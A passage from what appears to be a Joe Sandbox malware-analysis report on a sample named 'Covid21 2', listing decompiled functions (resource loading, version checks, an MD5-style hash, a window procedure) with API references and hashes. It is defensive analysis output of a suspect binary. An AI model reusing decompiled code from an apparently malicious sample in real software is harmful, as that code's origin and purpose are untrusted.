                                  • CallWindowProcA.USER32(?,?,00000082,?,?), ref: 00407EC3
                                  • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00407ED7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: FreeHeapPropWindow$CallNtdllProcProc_Removesprintf
                                  • String ID: PB_GadgetStack_%i
                                  • API String ID: 1062891511-1190326050
                                  • Opcode ID: 7d7e1b1d011a983b0eee80d24ab0f834da0d8447be6ad92cb7a62c00b7392fbf
                                  • Instruction ID: 9495be4684c954f4985c5bbed51e6b929ec62d50171bbc7e14f773bf1326b445
                                  • Opcode Fuzzy Hash: 7d7e1b1d011a983b0eee80d24ab0f834da0d8447be6ad92cb7a62c00b7392fbf
                                  • Instruction Fuzzy Hash: F9213772901209FFCF019F90ED44CAA7B7AFB44345B10807AF905A6270D735AE61EB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004020C9, Relevance: 4.5, APIs: 3, Instructions: 27COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E004020C9(struct HINSTANCE__* _a4, intOrPtr _a8) {
				struct HRSRC__* _v4;
				CHAR* _v8;
				struct HRSRC__* _t14;
				void* _t20;

				_push(0);
				_push(0);
				E00403100(_t20, _a8);
				_v4 = FindResourceA(_a4, _v8, 0xa);
				if(_v4 != 0) {
					 *0x40b174 = LoadResource(_a4, _v4);
					 *0x40b1b0 = SizeofResource(_a4, _v4);
				}
				_t14 = _v4;
				return E00407550(_t14, _v8);
			}







                                  0x004020cb
                                  0x004020cc
                                  0x004020d4
                                  0x004020eb
                                  0x004020f4
                                  0x00402103
                                  0x00402115
                                  0x00402115
                                  0x0040211a
                                  0x0040212d

                                  APIs
                                  • FindResourceA.KERNEL32(004013B1,00000000,0000000A), ref: 004020E6
                                  • LoadResource.KERNEL32(?,00000000,00000000,00000000,004013B1,OPS,00000000,00000000), ref: 004020FE
                                  • SizeofResource.KERNEL32(?,00000000,?,00000000,00000000,00000000,004013B1,OPS,00000000,00000000), ref: 00402110
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Resource$FindLoadSizeof
                                  • String ID:
                                  • API String ID: 507330600-0
                                  • Opcode ID: aa1a8b08b7dc22c46b1c861aeba25619853496701750f453b4bb729b9282f012
                                  • Instruction ID: ee1045747f34407a6d6bc23282b484ecb6b20e6a617ab4d886f8bfa51eb75997
                                  • Opcode Fuzzy Hash: aa1a8b08b7dc22c46b1c861aeba25619853496701750f453b4bb729b9282f012
                                  • Instruction Fuzzy Hash: 05F0B770508301EFC705AF20DE05A1EBAE5FB98B05F008C3EB5886A1A1D7359D24EB4A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403CD7, Relevance: 3.1, APIs: 2, Instructions: 75COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E00403CD7() {
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t22;
				intOrPtr _t24;
				void* _t25;
				void* _t31;
				void* _t36;
				void* _t38;

				_t36 = _t38 - 0x78;
				_t31 = 0x64;
				 *(_t36 - 0x1c) = 0x94;
				if(GetVersionExA(_t36 - 0x1c) != 0) {
					_t17 =  *((intOrPtr*)(_t36 - 0xc)) - 1;
					if(_t17 == 0) {
						if( *((intOrPtr*)(_t36 - 0x14)) == 0) {
							_push(0xa);
							goto L24;
						} else {
							if( *((intOrPtr*)(_t36 - 0x14)) == 0xa) {
								_push(0x1e);
								goto L24;
							} else {
								if( *((intOrPtr*)(_t36 - 0x14)) == 0x5a) {
									_push(0x28);
									goto L24;
								}
							}
						}
					} else {
						if(_t17 == 1) {
							_t20 =  *((intOrPtr*)(_t36 - 0x18)) - 3;
							if(_t20 == 0) {
								_push(5);
								goto L24;
							} else {
								_t21 = _t20 - 1;
								if(_t21 == 0) {
									_push(0x14);
									goto L24;
								} else {
									_t22 = _t21 - 1;
									if(_t22 == 0) {
										_t24 =  *((intOrPtr*)(_t36 - 0x14));
										if(_t24 == 0) {
											_push(0x32);
											goto L24;
										} else {
											_t25 = _t24 - 1;
											if(_t25 == 0) {
												_push(0x3c);
												goto L24;
											} else {
												if(_t25 == 1) {
													_push(0x41);
													goto L24;
												}
											}
										}
									} else {
										if(_t22 == 1) {
											_t31 = 0x46;
											 *(_t36 - 0xb8) = 0x9c;
											if(GetVersionExA(_t36 - 0xb8) != 0 &&  *((char*)(_t36 - 0x1e)) != 1) {
												_push(0x4b);
												L24:
												_pop(_t31);
											}
										}
									}
								}
							}
						}
					}
				}
				return _t31;
			}












                                  0x00403cd8
                                  0x00403cec
                                  0x00403cf1
                                  0x00403cfc
                                  0x00403d01
                                  0x00403d02
                                  0x00403d62
                                  0x00403d78
                                  0x00000000
                                  0x00403d64
                                  0x00403d68
                                  0x00403d74
                                  0x00000000
                                  0x00403d6a
                                  0x00403d6e
                                  0x00403d70
                                  0x00000000
                                  0x00403d70
                                  0x00403d6e
                                  0x00403d68
                                  0x00403d04
                                  0x00403d05
                                  0x00403d0a
                                  0x00403d0d
                                  0x00403d5a
                                  0x00000000
                                  0x00403d0f
                                  0x00403d0f
                                  0x00403d10
                                  0x00403d56
                                  0x00000000
                                  0x00403d12
                                  0x00403d12
                                  0x00403d13
                                  0x00403d3f
                                  0x00403d42
                                  0x00403d52
                                  0x00000000
                                  0x00403d44
                                  0x00403d44
                                  0x00403d45
                                  0x00403d4e
                                  0x00000000
                                  0x00403d47
                                  0x00403d48
                                  0x00403d4a
                                  0x00000000
                                  0x00403d4a
                                  0x00403d48
                                  0x00403d45
                                  0x00403d15
                                  0x00403d16
                                  0x00403d1a
                                  0x00403d22
                                  0x00403d30
                                  0x00403d38
                                  0x00403d7a
                                  0x00403d7a
                                  0x00403d7a
                                  0x00403d30
                                  0x00403d16
                                  0x00403d13
                                  0x00403d10
                                  0x00403d0d
                                  0x00403d05
                                  0x00403d02
                                  0x00403d83

                                  APIs
                                  • GetVersionExA.KERNEL32(?), ref: 00403CF8
                                  • GetVersionExA.KERNEL32(?), ref: 00403D2C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Version
                                  • String ID:
                                  • API String ID: 1889659487-0
                                  • Opcode ID: ba98cba157ab3b960229647d21839f567787df23c3c7d879bd2f0e37a5dce517
                                  • Instruction ID: 8f98cf7366f8b09a5e2b92140d047ce8a00d89b420ca6a4debb2036adb0e8e2a
                                  • Opcode Fuzzy Hash: ba98cba157ab3b960229647d21839f567787df23c3c7d879bd2f0e37a5dce517
                                  • Instruction Fuzzy Hash: 1E117231644A0A95EF309E689845FAF7EACAF10747F140037A201B53D4E67C8B46C66F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403CC0, Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403CC0() {
				_Unknown_base(*)()* _t1;
				_Unknown_base(*)()* _t2;

				_t1 =  *0x40b218; // 0x0
				_t2 = SetUnhandledExceptionFilter(_t1);
				 *0x40b218 = 0;
				return _t2;
			}





                                  0x00403cc0
                                  0x00403cc6
                                  0x00403ccc
                                  0x00403cd6

                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,00401BDA,00401BC0,00000001,00000010,OPS,00000000,00000000,00000000), ref: 00403CC6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: e0e7740ab41f41c427503136dfe7f7d29bd2fdb7ab83b42a702d68ec8da14e00
                                  • Instruction ID: cd7c64c5dc77f132242c3daac67179aa2c9d7864a58c2e899d60234b9b4753e9
                                  • Opcode Fuzzy Hash: e0e7740ab41f41c427503136dfe7f7d29bd2fdb7ab83b42a702d68ec8da14e00
                                  • Instruction Fuzzy Hash: 64B092740402008BCB008B90EE8C74836A4E398214F8009A8A000A6230C33880808BCD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406C10, Relevance: .6, Instructions: 601COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 48%
                                  			E00406C10(void* __ecx, intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				signed int _v68;
				intOrPtr* _t209;
				signed int _t212;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t220;
				signed int _t222;
				signed int _t224;
				signed int _t226;
				signed int _t228;
				signed int _t230;
				signed int _t232;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed int _t240;
				signed int _t242;
				intOrPtr _t253;
				signed int _t254;
				signed int _t289;
				signed int _t326;
				void* _t338;
				signed int _t339;
				signed int _t341;
				signed int _t343;
				signed int _t345;
				signed int _t347;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t364;
				signed int _t366;
				signed int _t368;
				signed int _t370;
				signed int _t372;
				signed int _t374;
				signed int _t376;
				signed int _t384;
				signed int _t386;
				signed int _t388;
				signed int _t390;
				signed int _t392;
				signed int _t394;
				signed int _t396;
				signed int _t398;
				signed int _t400;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				void* _t423;
				signed int _t495;
				signed int _t582;
				signed int _t588;
				signed int _t600;
				intOrPtr* _t680;
				char* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t686;
				signed int _t688;
				signed int _t690;
				signed int _t692;
				signed int _t694;
				signed int _t696;
				signed int _t698;
				signed int _t704;
				signed int _t706;
				signed int _t712;
				signed int _t714;
				signed int _t716;
				signed int _t718;
				signed int _t720;
				intOrPtr _t725;

				_t209 = _a4;
				_t338 = __ecx + 2;
				_t681 =  &_v64;
				_t423 = 0x10;
				do {
					_t254 =  *(_t338 - 1) & 0x000000ff;
					_t681 = _t681 + 4;
					_t338 = _t338 + 4;
					_t423 = _t423 - 1;
					 *(_t681 - 4) = (0 << 0x00000008 | _t254) << 0x00000008 |  *(_t338 - 6) & 0x000000ff;
				} while (_t423 != 0);
				_t682 =  *(_t209 + 4);
				_t384 =  *(_t209 + 8);
				_t339 =  *(_t209 + 0xc);
				asm("rol eax, 0x7");
				_t212 = ( !_t682 & _t339 | _t384 & _t682) + _v64 +  *_t209 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t341 = ( !_t212 & _t384 | _t682 & _t212) + _v60 + _t339 - 0x173848aa + _t212;
				asm("ror edx, 0xf");
				_t386 = ( !_t341 & _t682 | _t341 & _t212) + _v56 + _t384 + 0x242070db + _t341;
				asm("ror esi, 0xa");
				_t684 = ( !_t386 & _t212 | _t341 & _t386) + _v52 + _t682 - 0x3e423112 + _t386;
				asm("rol eax, 0x7");
				_t214 = ( !_t684 & _t341 | _t386 & _t684) + _v48 + _t212 - 0xa83f051 + _t684;
				asm("rol ecx, 0xc");
				_t343 = ( !_t214 & _t386 | _t684 & _t214) + _v44 + _t341 + 0x4787c62a + _t214;
				asm("ror edx, 0xf");
				_t388 = ( !_t343 & _t684 | _t343 & _t214) + _v40 + _t386 - 0x57cfb9ed + _t343;
				asm("ror esi, 0xa");
				_t686 = ( !_t388 & _t214 | _t343 & _t388) + _v36 + _t684 - 0x2b96aff + _t388;
				asm("rol eax, 0x7");
				_t216 = ( !_t686 & _t343 | _t388 & _t686) + _v32 + _t214 + 0x698098d8 + _t686;
				asm("rol ecx, 0xc");
				_t345 = ( !_t216 & _t388 | _t686 & _t216) + _v28 + _t343 - 0x74bb0851 + _t216;
				asm("ror edx, 0xf");
				_t390 = ( !_t345 & _t686 | _t345 & _t216) + _v24 + _t388 - 0xa44f + _t345;
				asm("ror esi, 0xa");
				_t688 = ( !_t390 & _t216 | _t345 & _t390) + _v20 + _t686 - 0x76a32842 + _t390;
				asm("rol eax, 0x7");
				_t218 = ( !_t688 & _t345 | _t390 & _t688) + _v16 + _t216 + 0x6b901122 + _t688;
				asm("rol ecx, 0xc");
				_t347 = ( !_t218 & _t390 | _t688 & _t218) + _v12 + _t345 - 0x2678e6d + _t218;
				_t495 =  !_t347;
				asm("ror edx, 0xf");
				_t392 = (_t495 & _t688 | _t347 & _t218) + _v8 + _t390 - 0x5986bc72 + _t347;
				_t289 =  !_t392;
				_v68 = _t289;
				_t725 = _v4;
				asm("ror esi, 0xa");
				_t690 = (_t289 & _t218 | _t347 & _t392) + _t725 + _t688 + 0x49b40821 + _t392;
				asm("rol eax, 0x5");
				_t220 = (_t495 & _t392 | _t347 & _t690) + _v60 + _t218 - 0x9e1da9e + _t690;
				asm("rol ecx, 0x9");
				_t349 = (_v68 & _t690 | _t392 & _t220) + _v40 + _t347 - 0x3fbf4cc0 + _t220;
				asm("rol edx, 0xe");
				_t394 = ( !_t690 & _t220 | _t349 & _t690) + _v20 + _t392 + 0x265e5a51 + _t349;
				asm("ror esi, 0xc");
				_t692 = ( !_t220 & _t349 | _t394 & _t220) + _v64 + _t690 - 0x16493856 + _t394;
				asm("rol eax, 0x5");
				_t222 = ( !_t349 & _t394 | _t349 & _t692) + _v44 + _t220 - 0x29d0efa3 + _t692;
				asm("rol ecx, 0x9");
				_t351 = ( !_t394 & _t692 | _t394 & _t222) + _v24 + _t349 + 0x2441453 + _t222;
				asm("rol edx, 0xe");
				_t396 = ( !_t692 & _t222 | _t351 & _t692) + _t725 + _t394 - 0x275e197f + _t351;
				asm("ror esi, 0xc");
				_t694 = ( !_t222 & _t351 | _t396 & _t222) + _v48 + _t692 - 0x182c0438 + _t396;
				asm("rol eax, 0x5");
				_t224 = ( !_t351 & _t396 | _t351 & _t694) + _v28 + _t222 + 0x21e1cde6 + _t694;
				asm("rol ecx, 0x9");
				_t353 = ( !_t396 & _t694 | _t396 & _t224) + _v8 + _t351 - 0x3cc8f82a + _t224;
				asm("rol edx, 0xe");
				_t398 = ( !_t694 & _t224 | _t353 & _t694) + _v52 + _t396 - 0xb2af279 + _t353;
				asm("ror esi, 0xc");
				_t696 = ( !_t224 & _t353 | _t398 & _t224) + _v32 + _t694 + 0x455a14ed + _t398;
				asm("rol eax, 0x5");
				_t226 = ( !_t353 & _t398 | _t353 & _t696) + _v12 + _t224 - 0x561c16fb + _t696;
				asm("rol ecx, 0x9");
				_t355 = ( !_t398 & _t696 | _t398 & _t226) + _v56 + _t353 - 0x3105c08 + _t226;
				asm("rol edx, 0xe");
				_t400 = ( !_t696 & _t226 | _t355 & _t696) + _v36 + _t398 + 0x676f02d9 + _t355;
				asm("ror esi, 0xc");
				_t698 = ( !_t226 & _t355 | _t400 & _t226) + _v16 + _t696 - 0x72d5b376 + _t400;
				asm("rol eax, 0x4");
				_t228 = (_t355 ^ _t400 ^ _t698) + _v44 + _t226 - 0x5c6be + _t698;
				asm("rol edi, 0xb");
				_t582 = (_t400 ^ _t698 ^ _t228) + _v32 + _t355 - 0x788e097f + _t228;
				asm("rol edx, 0x10");
				_t402 = (_t582 ^ _t698 ^ _t228) + _v20 + _t400 + 0x6d9d6122 + _t582;
				_t326 = _t582 ^ _t402;
				asm("ror ecx, 0x9");
				_t364 = (_t326 ^ _t228) + _v8 + _t698 - 0x21ac7f4 + _t402;
				asm("rol eax, 0x4");
				_t230 = (_t326 ^ _t364) + _v60 + _t228 - 0x5b4115bc + _t364;
				asm("rol esi, 0xb");
				_t704 = (_t402 ^ _t364 ^ _t230) + _v48 + _t582 + 0x4bdecfa9 + _t230;
				asm("rol edx, 0x10");
				_t404 = (_t704 ^ _t364 ^ _t230) + _v36 + _t402 - 0x944b4a0 + _t704;
				_t588 = _t704 ^ _t404;
				asm("ror ecx, 0x9");
				_t366 = (_t588 ^ _t230) + _v24 + _t364 - 0x41404390 + _t404;
				asm("rol eax, 0x4");
				_t232 = (_t588 ^ _t366) + _v12 + _t230 + 0x289b7ec6 + _t366;
				asm("rol esi, 0xb");
				_t706 = (_t404 ^ _t366 ^ _t232) + _v64 + _t704 - 0x155ed806 + _t232;
				asm("rol edi, 0x10");
				_t600 = (_t706 ^ _t366 ^ _t232) + _v52 + _t404 - 0x2b10cf7b + _t706;
				_t406 = _t706 ^ _t600;
				asm("ror ecx, 0x9");
				_t368 = (_t406 ^ _t232) + _v40 + _t366 + 0x4881d05 + _t600;
				asm("rol eax, 0x4");
				_t234 = (_t406 ^ _t368) + _v28 + _t232 - 0x262b2fc7 + _t368;
				asm("rol edx, 0xb");
				_t414 = (_t600 ^ _t368 ^ _t234) + _v16 + _t706 - 0x1924661b + _t234;
				asm("rol esi, 0x10");
				_t712 = (_t414 ^ _t368 ^ _t234) + _t725 + _t600 + 0x1fa27cf8 + _t414;
				asm("ror ecx, 0x9");
				_t370 = (_t414 ^ _t712 ^ _t234) + _v56 + _t368 - 0x3b53a99b + _t712;
				asm("rol eax, 0x6");
				_t236 = (( !_t414 | _t370) ^ _t712) + _v64 + _t234 - 0xbd6ddbc + _t370;
				asm("rol edx, 0xa");
				_t416 = (( !_t712 | _t236) ^ _t370) + _v36 + _t414 + 0x432aff97 + _t236;
				asm("rol esi, 0xf");
				_t714 = (( !_t370 | _t416) ^ _t236) + _v8 + _t712 - 0x546bdc59 + _t416;
				asm("ror ecx, 0xb");
				_t372 = (( !_t236 | _t714) ^ _t416) + _v44 + _t370 - 0x36c5fc7 + _t714;
				asm("rol eax, 0x6");
				_t238 = (( !_t416 | _t372) ^ _t714) + _v16 + _t236 + 0x655b59c3 + _t372;
				asm("rol edx, 0xa");
				_t418 = (( !_t714 | _t238) ^ _t372) + _v52 + _t416 - 0x70f3336e + _t238;
				asm("rol esi, 0xf");
				_t716 = (( !_t372 | _t418) ^ _t238) + _v24 + _t714 - 0x100b83 + _t418;
				asm("ror ecx, 0xb");
				_t374 = (( !_t238 | _t716) ^ _t418) + _v60 + _t372 - 0x7a7ba22f + _t716;
				asm("rol eax, 0x6");
				_t240 = (( !_t418 | _t374) ^ _t716) + _v32 + _t238 + 0x6fa87e4f + _t374;
				asm("rol edx, 0xa");
				_t420 = (( !_t716 | _t240) ^ _t374) + _t725 + _t418 - 0x1d31920 + _t240;
				asm("rol esi, 0xf");
				_t718 = (( !_t374 | _t420) ^ _t240) + _v40 + _t716 - 0x5cfebcec + _t420;
				asm("ror ecx, 0xb");
				_t376 = (( !_t240 | _t718) ^ _t420) + _v12 + _t374 + 0x4e0811a1 + _t718;
				asm("rol eax, 0x6");
				_t242 = (( !_t420 | _t376) ^ _t718) + _v48 + _t240 - 0x8ac817e + _t376;
				asm("rol edx, 0xa");
				_t422 = (( !_t718 | _t242) ^ _t376) + _v20 + _t420 - 0x42c50dcb + _t242;
				_t680 = _a4;
				asm("rol esi, 0xf");
				_t720 = (( !_t376 | _t422) ^ _t242) + _v56 + _t718 + 0x2ad7d2bb + _t422;
				 *_t680 =  *_t680 + _t242;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t680 + 4)) = (( !_t242 | _t720) ^ _t422) + _v28 + _t376 - 0x14792c6f +  *((intOrPtr*)(_t680 + 4)) + _t720;
				 *((intOrPtr*)(_t680 + 8)) =  *((intOrPtr*)(_t680 + 8)) + _t720;
				_t253 =  *((intOrPtr*)(_t680 + 0xc)) + _t422;
				 *((intOrPtr*)(_t680 + 0xc)) = _t253;
				return _t253;
			}



































































































                                  0x00406c10
                                  0x00406c1b
                                  0x00406c1e
                                  0x00406c22
                                  0x00406c27
                                  0x00406c27
                                  0x00406c30
                                  0x00406c33
                                  0x00406c47
                                  0x00406c4a
                                  0x00406c4a
                                  0x00406c4f
                                  0x00406c52
                                  0x00406c55
                                  0x00406c73
                                  0x00406c76
                                  0x00406c8d
                                  0x00406c90
                                  0x00406cab
                                  0x00406cae
                                  0x00406cc7
                                  0x00406cca
                                  0x00406ce3
                                  0x00406ce6
                                  0x00406cfd
                                  0x00406d00
                                  0x00406d1b
                                  0x00406d1e
                                  0x00406d35
                                  0x00406d38
                                  0x00406d53
                                  0x00406d56
                                  0x00406d6d
                                  0x00406d70
                                  0x00406d8b
                                  0x00406d8e
                                  0x00406da7
                                  0x00406daa
                                  0x00406dc3
                                  0x00406dc6
                                  0x00406ddd
                                  0x00406de0
                                  0x00406de4
                                  0x00406dfd
                                  0x00406e00
                                  0x00406e04
                                  0x00406e06
                                  0x00406e12
                                  0x00406e1f
                                  0x00406e22
                                  0x00406e3d
                                  0x00406e40
                                  0x00406e51
                                  0x00406e54
                                  0x00406e6d
                                  0x00406e70
                                  0x00406e8b
                                  0x00406e8e
                                  0x00406ea7
                                  0x00406eaa
                                  0x00406ec1
                                  0x00406ec4
                                  0x00406edb
                                  0x00406ede
                                  0x00406ef7
                                  0x00406efa
                                  0x00406f15
                                  0x00406f18
                                  0x00406f2f
                                  0x00406f32
                                  0x00406f4b
                                  0x00406f4e
                                  0x00406f69
                                  0x00406f6c
                                  0x00406f85
                                  0x00406f88
                                  0x00406f9f
                                  0x00406fa2
                                  0x00406fbb
                                  0x00406fbe
                                  0x00406fd7
                                  0x00406fda
                                  0x00406fed
                                  0x00406ff0
                                  0x00407003
                                  0x00407006
                                  0x0040701b
                                  0x0040701e
                                  0x00407020
                                  0x00407031
                                  0x00407034
                                  0x00407047
                                  0x0040704a
                                  0x00407059
                                  0x0040705c
                                  0x0040706f
                                  0x00407072
                                  0x00407076
                                  0x00407087
                                  0x0040708a
                                  0x00407099
                                  0x0040709c
                                  0x004070af
                                  0x004070b2
                                  0x004070c5
                                  0x004070c8
                                  0x004070cc
                                  0x004070dd
                                  0x004070e0
                                  0x004070f3
                                  0x004070f6
                                  0x00407105
                                  0x00407108
                                  0x00407119
                                  0x0040711c
                                  0x0040712f
                                  0x00407132
                                  0x00407147
                                  0x0040714a
                                  0x0040715f
                                  0x00407162
                                  0x00407177
                                  0x0040717a
                                  0x0040718f
                                  0x00407192
                                  0x004071a7
                                  0x004071aa
                                  0x004071bf
                                  0x004071c6
                                  0x004071db
                                  0x004071de
                                  0x004071ef
                                  0x004071f2
                                  0x00407207
                                  0x0040720a
                                  0x0040721d
                                  0x00407220
                                  0x00407239
                                  0x0040723c
                                  0x0040724d
                                  0x00407250
                                  0x00407265
                                  0x00407268
                                  0x0040727d
                                  0x00407280
                                  0x00407295
                                  0x0040729f
                                  0x004072a2
                                  0x004072ac
                                  0x004072b5
                                  0x004072bd
                                  0x004072c5
                                  0x004072cb
                                  0x004072cd
                                  0x004072d7

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1d082fc67961cf9c9017bdebd9d0fdabf83cbc1f99fd689fd60a11460bf935a
                                  • Instruction ID: 7102d13b211e639c190c95f68438129d24ba1901ff3681f10da7641a22d18450
                                  • Opcode Fuzzy Hash: a1d082fc67961cf9c9017bdebd9d0fdabf83cbc1f99fd689fd60a11460bf935a
                                  • Instruction Fuzzy Hash: 7A12D3BBA557124BD708CA55CC80295B3E3BBC8364B1F913DD959D3305EEB9BA0B46C0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040523F, Relevance: 46.8, APIs: 31, Instructions: 333windowkeyboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 66%
                                  			E0040523F(struct HWND__* _a4, intOrPtr _a8, signed int _a12, unsigned int _a16) {
				struct HINSTANCE__* _v8;
				void _v12;
				struct tagPOINT _v20;
				intOrPtr _t104;
				void* _t110;
				void* _t111;
				void* _t112;
				int _t115;
				void* _t122;
				void* _t123;
				void* _t126;
				int _t129;
				void* _t130;
				int _t134;
				unsigned int _t141;
				int _t175;
				void* _t181;
				int _t182;
				int _t190;
				int* _t196;
				void* _t199;
				signed int _t201;

				_t196 = E0040642D( *0x40b3f4);
				_v8 = 0xd0d0d0d1;
				if( *_t196 != 0) {
					_t104 = _a8;
					if(_t104 != 0x200) {
						if(_t104 != 0x100) {
							if(_t104 == 0x202) {
								L60:
								ReleaseCapture();
								L65:
								_v8 = 0;
								L66:
								return _v8;
							}
							if(_t104 != 0x215) {
								goto L66;
							}
							PostMessageA(_a4, 0x232, 0, 0);
							 *_t196 = 0;
							if(_t196[1] != 0) {
								SetCursorPos(_t196[2], _t196[3]);
							}
							goto L65;
						}
						_t110 = _a12 - 0xd;
						if(_t110 == 0) {
							goto L60;
						}
						_t111 = _t110 - 0xe;
						if(_t111 == 0) {
							goto L60;
						}
						_t199 = 0xa;
						_t112 = _t111 - _t199;
						if(_t112 == 0) {
							GetCursorPos( &_v20);
							_t115 = _t196[0xc];
							if(_t115 != 0) {
								if(_t115 != 3) {
									if(_t115 != 6) {
										_v20.x = _v20.x - _t199;
										L58:
										E004051F1(_t196, _a4, _v20.x, _v20.y);
										L59:
										goto L66;
									}
									_push(_t196[7]);
									L32:
									_push(_t196[4].left);
									_t196[0xc] = 7;
									L33:
									_push(0x7f83);
									L34:
									E00405093();
									goto L59;
								}
								_t122 = 2;
								L49:
								_push(_t196[5] + _t122);
								_t196[0xc] = 4;
								_t181 = _t196[4].left + _t122;
								L29:
								_push(_t181);
								_push(0x7f82);
								goto L34;
							}
							_t196[0xc] = 1;
							_push(_v20.y);
							_push(_t196[4]);
							L38:
							_push(0x7f84);
							goto L34;
						}
						_t123 = _t112 - 1;
						if(_t123 == 0) {
							GetCursorPos( &_v20);
							_t182 = _t196[0xc];
							if(_t182 != 0) {
								_t122 = 2;
								if(_t182 != _t122) {
									if(_t182 != 1) {
										_v20.y = _v20.y - _t199;
										goto L58;
									}
									goto L49;
								}
								_push(_t196[5]);
								_t196[0xc] = 5;
								_push(_t196[6] - _t122);
								goto L33;
							}
							_push(_t196[5]);
							_t196[0xc] = 3;
							L26:
							_push(_v20.x);
							_push(0x7f85);
							goto L34;
						}
						_t126 = _t123 - 1;
						if(_t126 == 0) {
							GetCursorPos( &_v20);
							_t129 = _t196[0xc];
